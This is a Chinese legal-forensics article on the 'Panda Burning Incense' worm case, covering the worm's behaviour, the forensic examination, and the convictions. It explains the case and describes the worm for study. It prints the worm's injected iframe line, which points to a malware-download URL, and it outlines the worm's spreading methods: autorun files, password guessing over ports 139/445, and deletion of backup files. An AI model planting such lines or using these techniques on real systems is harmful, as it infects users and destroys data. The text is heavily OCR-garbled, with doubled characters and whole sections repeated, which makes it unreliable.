由“熊猫烧香”案件看相关软件司法鉴定的过程 长昊商业秘密律师 【案件简介】 从2006年年底到2007年年初,短短的两个多月时间,一个名为熊猫烧香的病毒不断入 侵个人计算机、感染门户网站、击溃数据系统,给上百万个人用户、网吧及企业局域网用户带来无法估量的损失,被《2006年度中国大陆地区计算机病毒疫情和互联网安全报告》评为“毒王”。 9.1.2熊猫烧香病毒介绍 病毒名称:熊猫烧香,WOrm. whboy.(金山称),worm. nimaya.(瑞星称)。 病毒别名:尼姆亚,武汉男生,后又化身为“金猪报喜”。 危险级别:★★★★★ 病毒类型:蠕虫病毒,能够终止大量的反病毒软件和防火墙软件进程 影响系统: Windows9x/ME、 Windows2000/NT、 Windows XP、 Windows2003。 病毒具体描述:熊猫烧香是一种虫病毒,而且多次变种。尼姆亚变种W(wormnimaya.w),由于中毒计算机的可执行文件会出现“熊猫烧香”图案(图9-1),被感染的用户系统中所有exe可执行文件全部被改成熊猫举着三根香的模样,因此被称为“熊猫烧香”病毒。 病毒危害:该病毒的某些变种可以通过局域网进行传播,在极短时间之内就可以感染几千台计算机,用户计算机中毒后可能会出现蓝屏、频繁重启以及系统硬盘中数据文件被破坏等现象,最终导致局域网瘫痪,无法正常使用。该病毒会删除扩展名为gho的文件,使用户无法使用用 Ghost软件恢复图9-1熊猫烧香中毒后的图案操作作系统。熊猫烧香感染系统统的,exe、,com、pif、.src、.html、asp文件,添加病毒网址,导致用户一打开这些网页文件,IE就会自动连接到指定的病毒网址中下载病毒。在硬盘各个分区下生成文件 autorun,inf和 setup.exe,可以通过U盘和移动硬盘等方式进行传播,并且利用 Windows系统的自动播放功能来运行,搜索硬盘中的.eXe可执行文件并感染,感染后的文件图标变成“熊猫烧香”图案。熊猫烧香还可以通过共享文件夹、系统弱口令等多种方式进行传播。该病毒会在中毒计算机中所有的网页文件尾部添加病毒代码。一些网站编辑人员的计算机如果被该病毒感染,上传网页到网站后,就会导致用户测览这些网站时也被病毒感染。据悉,多家著名网站就是遭到此类攻击,相继被植入病毒。由于这些网站的浏览量非常大,导致熊猫烧香病毒的感染范围非常广,中毒企业和政府机构不计其数,其中不乏金融、税务、能能源等关系到国计民生的重要单位。 1.本地磁盘感染 (1)感感染对象:病病毒对系统中所有(除了盘符为A、B的磁盘)类型为为 DRIVEEMOTE, DRIVE FIXED的磁盘进行文件遍历感染(不感染大小超过10485760字节以上的文件)。 (2)感染方式:病毒使用两类感染方式应对不同后缀的文件名进行感染。二进制可执行文件(后级名为.eXe、。SCIr、,pif、.com):将感染目标文件和病毒溶合成个文件(被感染文件贴在病毒文件尾部)完成感染脚本类(后缀名为.htm、.html、.aSp、.php、・JSP、.aspx):在这些脚本文件尾加上如下链接(下面的页面存在安全漏洞),iframesrc=http://www.krvkr.com/worm.htnwidth= height=0></ iframe>在感染时会删除这些磁盘上的后缀名为.gho的文件。 2.生成 autorun.inf病毒建立一个计时器,以以0.6秒为周期在磁盘的根目录下,生成 setup.exe(病毒本身)autorun.inf并利用用 Autorun Open关联使病毒在用户单击被感染磁盘时能被自动运行。 3.局域网传播 病毒生成随机各局域网传播线程,实现如下的传播方式:当病毒发现能成功连接攻击目标的139或445端口后,将使用内置的一个用户列表及密码字典进行连接(猜测被攻击端的密码)。当成功连接以后,将自己复制并利用计划任务启动激活病毒;修改操作系统的启 动关联;下载文件启动;与杀毒软件对抗。 【案件分析】 1鉴定要求 2007年2月6号,对主要犯罪嫌疑人李某出租屋中收集的检材,某市公安局网监大队委托××××司法鉴定所进行司法鉴定。 (1)鉴定检材中是否存在制作传播病毒的证据。 (2)鉴定病毒编写的相关时间信息及病毒制作方式。 (3)提取病毒样本及与案件相关的其他证据。 2鉴定环境 (1)硬件:取证用台式计算机( dell-dimension5150)、高速硬盘复制机、四合一只读 读卡器、取证硬盘、各类接口转换卡、数据线、移动硬盘、U盘。 (2)软件: Microsoft Windows Server2003 Enterprise Edition、 Encase5.04b、 Ultraedit-32。 3材克隆和MD5值值校验 使用硬盘复制机将原始硬盘数据克隆至无任何数据的取证硬盘,克隆后的取证硬盘与取证计算机连接,其他介质通过只读读卡器与计算机连接。连接后通过 Encase软件进行初步分析,如果数据已被删除,则利用数据恢复工具进行恢复,对全部嫌疑数据进行分析统计并形成鉴定报告证据文件固定后进行MD5值校验。整个操作流程对原始存储媒介中保存的原始信息不会造成任何影响 (3)提取病毒样本及与案件相关的其他证据。 4鉴定环境 (1)硬件:取证用台式计算机( dell-dimension5150)、高速硬盘复制机、四合一只读 读卡器、取证硬盘、各类接口转换卡、数据线、移动硬盘、U盘。 (2)软件: Microsoft Windows Server2003 Enterprise Edition、 Encase5.04b、 Ultraedit-32。 5材克隆和MD5值值校验 使用硬盘复制机将原始硬盘数据克隆至无任何数据的取证硬盘,克隆后的取证硬盘与取证计算机连接,其他介质通过只读读卡器与计算机连接。连接后通过 Encase软件进行初步分析,如果数据已被删除,则利用数据恢复工具进行恢复,对全部嫌疑数据进行分析统计并形成鉴定报告证据文件固定后进行MD5值校验。整个操作流程对原始存储媒介中保存的原始信息不会造成任何影响 6定结论 综合以上信息进行分析可以认定:李某使用的存储介质中存在制作传播木马病毒的证 据。其证据罗列如下。 (1)制作和传播木马病毒的实验环境。 (2)编编写病毒代码的软件工具。 (3)所编写的多个病毒源代码及由该代码所生成的可执行文件。 (4)通过该木马软件直接或间接获得他人计算机内的游戏戏账号和登录口令等信息 (5)所出售木马病毒代码和木马生成器的价格。 (6)关技术资料时留下的收藏网址和多次访问病毒源码时留下的历史记录。 (7)木马病毒编写的大致时间从“蓝天使移动硬盘”上反映的信息来看,应该是在2006年 10月16日或之前更早的时间,在2006年10月16日之后曾经多次对其进行了修改和升 级。其制作方式从多个代码的内容来看,应该是使用的“类C语言”、“ Delphi”、“汇编”和DOS中的“bat”语法,不排除其整合其他多个病毒代码(如威金病毒代码等)自己加工成新木马病毒的可能。 整个鉴定报告是按照《刑法》第二百八十六条的相关内容“违反国家规定,对计算机信息 系统功能进行删除、修改、增加、干扰,造成计算机信息系统不能正常运行,后果严重的,处五年以下有期徒刑或者拘役;后果特别严重的,处五年以上有期徒刑。违反国家规定,对计算机信息系统中存储、处理或者传输的数据和应用程序进行删除、修改、增加的操作,后果严重的,依照前款的规定处罚。故意制作、传播计算机病毒等破坏性程序,影响计算机系统正常运行,后果严重重的,依照第一款的规定处罚。”来制作的,主要从“故意制作”和“故意传播和非法盈利”来来寻找和提供证据 【法院判决】 熊猫烧香是我国近年来最为严重的计算机蠕虫病毒事件,在互联网上引起巨大震荡,受广大的民众、媒体和IT公司人士关注,因此,审理此案的某人民法院出现该院有史以来刑事审判旁听爆满的情况。最后,经过司法审判,整个鉴定报告得到了法庭的采信,“熊熊猫烧香”案的相关案案犯一一获刑,法院以破坏计算算机信息系统罪判处李某有期徒刑4年、王某有期徒刑2年6个月、张某有期徒刑2年、雷某有期徒刑一年,并判决李某、王某、张某的违法所得予以追缴,上缴国库。 【思考】 从“熊猫烧香”的研究可以看到:一方面,“熊猫烧香”案审判表明我国司法鉴定理论与实务,在惩治计算机犯罪方面前进了一大步,给以后的计算机案件处理提供了借鉴;另一方 面,“熊猫烧香”案中出现的一系列计算机技术问题及法律的应用,给学界和司法实务部门提出了新的挑战,促使我国惩治计算机犯罪相关法律的完善以及计算机司法鉴定技术的进一 步成熟。 |